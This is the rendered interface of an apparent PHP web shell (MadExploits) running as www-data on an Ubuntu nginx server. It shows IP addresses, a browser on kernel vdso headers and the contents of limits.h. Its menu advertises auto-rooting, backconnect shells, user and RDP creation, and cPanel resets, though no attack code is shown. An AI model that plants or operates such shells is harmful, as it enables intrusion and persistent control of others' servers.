Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.189
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
src /
linux-headers-5.15.0-160 /
include /
vdso /
[ HOME SHELL ]
Name
Size
Permission
Action
bits.h
171
B
-rw-r--r--
clocksource.h
479
B
-rw-r--r--
const.h
196
B
-rw-r--r--
datapage.h
4.12
KB
-rw-r--r--
helpers.h
1.27
KB
-rw-r--r--
jiffies.h
298
B
-rw-r--r--
ktime.h
454
B
-rw-r--r--
limits.h
564
B
-rw-r--r--
math64.h
468
B
-rw-r--r--
processor.h
251
B
-rw-r--r--
time.h
190
B
-rw-r--r--
time32.h
274
B
-rw-r--r--
time64.h
426
B
-rw-r--r--
vsyscall.h
288
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : limits.h
/* SPDX-License-Identifier: GPL-2.0 */ #ifndef __VDSO_LIMITS_H #define __VDSO_LIMITS_H #define USHRT_MAX ((unsigned short)~0U) #define SHRT_MAX ((short)(USHRT_MAX >> 1)) #define SHRT_MIN ((short)(-SHRT_MAX - 1)) #define INT_MAX ((int)(~0U >> 1)) #define INT_MIN (-INT_MAX - 1) #define UINT_MAX (~0U) #define LONG_MAX ((long)(~0UL >> 1)) #define LONG_MIN (-LONG_MAX - 1) #define ULONG_MAX (~0UL) #define LLONG_MAX ((long long)(~0ULL >> 1)) #define LLONG_MIN (-LLONG_MAX - 1) #define ULLONG_MAX (~0ULL) #define UINTPTR_MAX ULONG_MAX #endif /* __VDSO_LIMITS_H */
Close